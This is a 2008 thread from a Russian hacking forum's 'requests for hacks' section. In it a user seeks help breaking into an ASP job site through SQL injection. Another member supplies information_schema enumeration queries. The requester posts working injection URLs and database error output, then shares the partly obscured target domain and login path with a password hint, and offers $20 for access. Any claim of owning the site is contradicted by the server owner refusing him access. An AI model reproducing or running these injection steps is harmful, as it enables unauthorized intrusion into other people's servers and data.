ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с MS SQL
  #1  
Старый 27.10.2008, 20:30
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию Помогите с MS SQL

Копаю сайт уже две недели. Нашёл несколько работающих инклудов.

Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь. Ничё не подошло. Знаю только одну таблицу 'Jobs'.

Доступ к сайту запаролен. Админ там давно не был и не хочет давать доступ в адмику так как сервер его, а сайт мой (он для меня делал).

Пишите в личку дам пароль.
 

  #2  
Старый 27.10.2008, 20:40
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь.
в mssql все проще
select top 1 table_name from information_schema.tables
select top 1 column_name from information_schema.columns where table_name='name'
 

  #3  
Старый 27.10.2008, 20:53
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию

не прокатывает, причём работает только когда делаю запросы /viewjob.asp?v=1 union select * from jobs без ' и --
Цитата:
Сообщение от aka PSIH  
select top 1 table_name from information_schema.tables
Код:
Microsoft JET Database Engine error '80040e14'

Syntax error. in query expression 'id = 440 select top 1 table_name from information_schema.tables'.

/jobs/editjob.asp, line 7
Цитата:
Сообщение от aka PSIH  
select top 1 column_name from information_schema.columns where table_name='name'
Код:
Microsoft JET Database Engine error '80040e14'

Syntax error. in query expression 'id = 440 select top 1 column_name from information_schema.columns where table_name='jobs''.

/jobs/editjob.asp, line 7
P.S. Я здесь все туториалы перекопал.

Последний раз редактировалось strecher; 27.10.2008 в 20:59..
 

  #4  
Старый 27.10.2008, 21:00
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

 

  #5  
Старый 27.10.2008, 21:18
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию

Первую статью я вчера прочитал.

Вторую уже

Почему select top 1 неработает хотя select union 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26 from jobs работает?
 

  #6  
Старый 27.10.2008, 21:30
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию

этот запрос хорошо проходит

Код:
http://www.site.com/news.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+  INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+  (char(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)))--
Microsoft JET Database Engine error '80004005'

Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.md b'.

/jobs/editjob.asp, line 7

как бы мне им воспользоватся?
 

  #7  
Старый 27.10.2008, 23:35
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию

ну у меня есть $20 в paypal'е так что дерзайте, доступ нужен позарез.

z_i_b_i_o.co.uk/jobs/login.ht_m (уберери _)

два85три9867адын - за пассом
 

  #8  
Старый 28.10.2008, 04:53
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

 

  #9  
Старый 28.10.2008, 13:51
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
По умолчанию

Цитата:
Сообщение от aka PSIH  
спасибо, вроде всё то.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ